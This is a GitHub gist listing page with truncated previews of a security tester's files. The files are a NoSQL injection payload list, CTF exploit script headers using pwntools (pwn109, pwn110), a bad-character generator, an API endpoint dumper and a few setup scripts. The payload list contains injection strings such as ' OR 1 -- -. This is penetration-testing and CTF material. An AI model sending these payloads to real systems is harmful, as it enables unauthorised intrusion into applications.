View nosql-injection-payloads-for-postman.json
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ | |
{"payload":"'"}, | |
{"payload":"''"}, | |
{"payload":";%00"}, | |
{"payload":"--"}, | |
{"payload":"-- -"}, | |
{"payload":"\"\""}, | |
{"payload":";"}, | |
{"payload":"' OR '1"}, | |
{"payload":"' OR 1 -- -"}, |
View guid_reaper.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import argparse | |
import datetime | |
import re | |
import sys | |
import uuid | |
############################################################################### | |
# Based off of Daniel Thatcher's guid tool |
View dump-endpoints.jq
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) [] |
View thm-dump.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import getpass | |
import time | |
import requests | |
from requests.cookies import create_cookie | |
from requests.adapters import HTTPAdapter | |
from requests.packages.urllib3.util.retry import Retry | |
import re | |
from typing import List |
View exploit110.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import sys | |
from pwn import * | |
exe = "./pwn110.pwn110" | |
elf = context.binary = ELF(exe, checksec=False) | |
context.log_level = 'info' | |
def start(argv=[], *a, **kw): |
View gist:18500ab8c14893da46ae095678a12f43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import sys | |
from pwn import * | |
exe = "./pwn109.pwn109" | |
elf = context.binary = ELF(exe, checksec=False) | |
context.log_level = 'info' | |
def start(argv=[], *a, **kw): |
View setup_vpn.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Author: Dana Epp (@danaepp) | |
GROUP_NAME="DisposableVPN" | |
VM_NAME="DisposableVPN" | |
REGION="canadacentral" | |
PORT="51820" | |
echo "Creating resource group '$GROUP_NAME'..." |
View gen_badchars.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import sys | |
sys.stdout.write("badchars = (\n\tb\"") | |
pos = 0 | |
for x in range(0,256): | |
sys.stdout.write( "\\x" + '{0:02x}'.format(x)) | |
if pos == 15: |
View setup_report_env.sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
function needInstall() { | |
echo "Checking for $1..." | |
if ! [ -x "$(command -v $1)" ]; then | |
return 0; | |
else | |
return 1; | |
fi |
View designer.html
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<link rel="import" href="../polymer/polymer.html"> | |
<polymer-element name="my-element"> | |
<template> | |
<style> | |
:host { | |
position: absolute; | |
width: 100%; | |
height: 100%; |
NewerOlder